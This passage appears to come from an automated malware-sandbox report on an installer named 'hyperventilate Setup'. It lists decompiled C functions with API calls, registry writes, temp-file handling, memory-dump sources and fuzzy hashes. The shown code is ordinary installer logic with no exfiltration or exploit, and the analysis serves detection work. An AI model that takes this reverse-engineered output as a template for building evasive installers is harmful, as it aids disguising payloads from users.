                                                                                                                              • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3294113728-0
                                                                                                                              • Opcode ID: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                                                              • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                                                              • Opcode Fuzzy Hash: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                                                              • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00404F04(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B88(0, _t39, 0x41fc78, 0x41fc78, _a4);
					}
					_t26 = lstrlenA(0x41fc78);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc78)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc78, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                              0x00404f0a
                                                                                                                              0x00404f16
                                                                                                                              0x00404f19
                                                                                                                              0x00404f1f
                                                                                                                              0x00404f2b
                                                                                                                              0x00404f2e
                                                                                                                              0x00404f31
                                                                                                                              0x00404f37
                                                                                                                              0x00404f37
                                                                                                                              0x00404f3d
                                                                                                                              0x00404f45
                                                                                                                              0x00404f48
                                                                                                                              0x00404f65
                                                                                                                              0x00404f69
                                                                                                                              0x00404f72
                                                                                                                              0x00404f72
                                                                                                                              0x00404f7c
                                                                                                                              0x00404f85
                                                                                                                              0x00404f91
                                                                                                                              0x00404f98
                                                                                                                              0x00404f9c
                                                                                                                              0x00404f9f
                                                                                                                              0x00404fb2
                                                                                                                              0x00404fc0
                                                                                                                              0x00404fc0
                                                                                                                              0x00404fc4
                                                                                                                              0x00404fc6
                                                                                                                              0x00404fc9
                                                                                                                              0x00000000
                                                                                                                              0x00404fc9
                                                                                                                              0x00404f4a
                                                                                                                              0x00404f52
                                                                                                                              0x00404f5a
                                                                                                                              0x00404f60
                                                                                                                              0x00000000
                                                                                                                              0x00404f60
                                                                                                                              0x00404f5a
                                                                                                                              0x00404f48
                                                                                                                              0x00404fd3

                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                              • lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                              • lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                                              • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2531174081-0
                                                                                                                              • Opcode ID: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                                              • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                                                              • Opcode Fuzzy Hash: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                                              • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8; // 0x0
					if(__eflags == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                                              0x00402bdf
                                                                                                                              0x00402be1
                                                                                                                              0x00402be8
                                                                                                                              0x00402beb
                                                                                                                              0x00402beb
                                                                                                                              0x00402bf1
                                                                                                                              0x00000000
                                                                                                                              0x00402bf1
                                                                                                                              0x00402bf9
                                                                                                                              0x00402bff
                                                                                                                              0x00000000
                                                                                                                              0x00402c02
                                                                                                                              0x00402c09
                                                                                                                              0x00402c0f
                                                                                                                              0x00402c15
                                                                                                                              0x00402c17
                                                                                                                              0x00402c1d
                                                                                                                              0x00402c5b
                                                                                                                              0x00402c64
                                                                                                                              0x00000000
                                                                                                                              0x00402c69
                                                                                                                              0x00402c1f
                                                                                                                              0x00402c26
                                                                                                                              0x00402c37
                                                                                                                              0x00000000
                                                                                                                              0x00402c45
                                                                                                                              0x00402c26
                                                                                                                              0x00402c71

                                                                                                                              APIs
                                                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402BEB
                                                                                                                              • GetTickCount.KERNEL32 ref: 00402C09
                                                                                                                              • wsprintfA.USER32 ref: 00402C37
                                                                                                                                • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                                • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                                • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                                                • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                                • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                                • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                                • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                                                                • Part of subcall function 00402BB7: MulDiv.KERNEL32(00000000,00000064,?), ref: 00402BCC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                              • String ID: ... %d%%
                                                                                                                              • API String ID: 722711167-2449383134
                                                                                                                              • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                                              • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                                                              • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                                              • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                              0x004047e1
                                                                                                                              0x004047ee
                                                                                                                              0x004047f4
                                                                                                                              0x00404832
                                                                                                                              0x00404832
                                                                                                                              0x00404841
                                                                                                                              0x00404848
                                                                                                                              0x00000000
                                                                                                                              0x0040484a
                                                                                                                              0x004047f6
                                                                                                                              0x00404805
                                                                                                                              0x0040480d
                                                                                                                              0x00404810
                                                                                                                              0x00404822
                                                                                                                              0x00404828
                                                                                                                              0x0040482f
                                                                                                                              0x00000000
                                                                                                                              0x0040482f
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
                                                                                                                              • GetMessagePos.USER32 ref: 004047F6
                                                                                                                              • ScreenToClient.USER32 ref: 00404810
                                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
                                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                              • String ID: f
                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                              • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                              • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                                                              • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                              • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                              0x00402b48
                                                                                                                              0x00402b56
                                                                                                                              0x00402b5c
                                                                                                                              0x00402b5c
                                                                                                                              0x00402b6a
                                                                                                                              0x00402b6c
                                                                                                                              0x00402b78
                                                                                                                              0x00402b7d
                                                                                                                              0x00402b7f
                                                                                                                              0x00402b7f
                                                                                                                              0x00402b8a
                                                                                                                              0x00402b9a
                                                                                                                              0x00402bac
                                                                                                                              0x00402bac
                                                                                                                              0x00402bb4

                                                                                                                              APIs
                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                                              • wsprintfA.USER32 ref: 00402B8A
                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                                                              • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                              • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                                              • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                                                              • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                                              • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403978, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423eb0; // 0x55edd0
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, "hyperventilate Setup", 0xfffffffe));
						_t11 =  *0x423ecc; // 0x3
						_t27 =  *0x423ec8; // 0x55ef7c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x55ef94
								_t11 = E00405B88(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                                                                                                              0x0040397c
                                                                                                                              0x00403981
                                                                                                                              0x00403987
                                                                                                                              0x0040398c
                                                                                                                              0x0040398c
                                                                                                                              0x00403994
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403996
                                                                                                                              0x0040399c
                                                                                                                              0x004039a4
                                                                                                                              0x004039a6
                                                                                                                              0x004039ac
                                                                                                                              0x004039ac
                                                                                                                              0x004039ae
                                                                                                                              0x004039ba
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004039be
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004039c0
                                                                                                                              0x004039c5
                                                                                                                              0x004039ce
                                                                                                                              0x004039d4
                                                                                                                              0x004039d9
                                                                                                                              0x004039ed
                                                                                                                              0x004039f8
                                                                                                                              0x00403a10
                                                                                                                              0x00403a16
                                                                                                                              0x00403a1b
                                                                                                                              0x00403a23
                                                                                                                              0x00403a44
                                                                                                                              0x00403a44
                                                                                                                              0x00403a44
                                                                                                                              0x00403a25
                                                                                                                              0x00403a27
                                                                                                                              0x00403a27
                                                                                                                              0x00403a2b
                                                                                                                              0x00403a2e
                                                                                                                              0x00403a32
                                                                                                                              0x00403a32
                                                                                                                              0x00403a37
                                                                                                                              0x00403a3d
                                                                                                                              0x00403a3d
                                                                                                                              0x00000000
                                                                                                                              0x00403a27
                                                                                                                              0x004039db
                                                                                                                              0x004039e0
                                                                                                                              0x004039e9
                                                                                                                              0x004039e2
                                                                                                                              0x004039e2
                                                                                                                              0x004039e2
                                                                                                                              0x004039e0

                                                                                                                              APIs
                                                                                                                              • SetWindowTextA.USER32(00000000,hyperventilate Setup), ref: 00403A10
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: TextWindow
                                                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\$hyperventilate Setup$|U
                                                                                                                              • API String ID: 530164218-4079328478
                                                                                                                              • Opcode ID: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                                                              • Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
                                                                                                                              • Opcode Fuzzy Hash: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                                                              • Instruction Fuzzy Hash: F611C2B1B005109BC730DF15D880A73767DEB84716369413BE94167391C77EAE028E58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 90%
                                                                                                                              			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t30 =  *0x423f50; // 0x0
				_t31 = _t30 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a370) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F18(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}











                                                                                                                              0x00402304
                                                                                                                              0x00402309
                                                                                                                              0x00402313
                                                                                                                              0x0040231d
                                                                                                                              0x00402320
                                                                                                                              0x0040232a
                                                                                                                              0x00402330
                                                                                                                              0x0040233a
                                                                                                                              0x00402341
                                                                                                                              0x00402349
                                                                                                                              0x00402357
                                                                                                                              0x0040235b
                                                                                                                              0x00402366
                                                                                                                              0x00402366
                                                                                                                              0x0040236a
                                                                                                                              0x0040236e
                                                                                                                              0x00402374
                                                                                                                              0x00402379
                                                                                                                              0x00402379
                                                                                                                              0x0040237d
                                                                                                                              0x00402389
                                                                                                                              0x00402389
                                                                                                                              0x004023a2
                                                                                                                              0x004023a4
                                                                                                                              0x004023a4
                                                                                                                              0x004023a7
                                                                                                                              0x0040247d
                                                                                                                              0x0040247d
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                              • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402341
                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscEE2E.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402361
                                                                                                                              • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscEE2E.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040239A
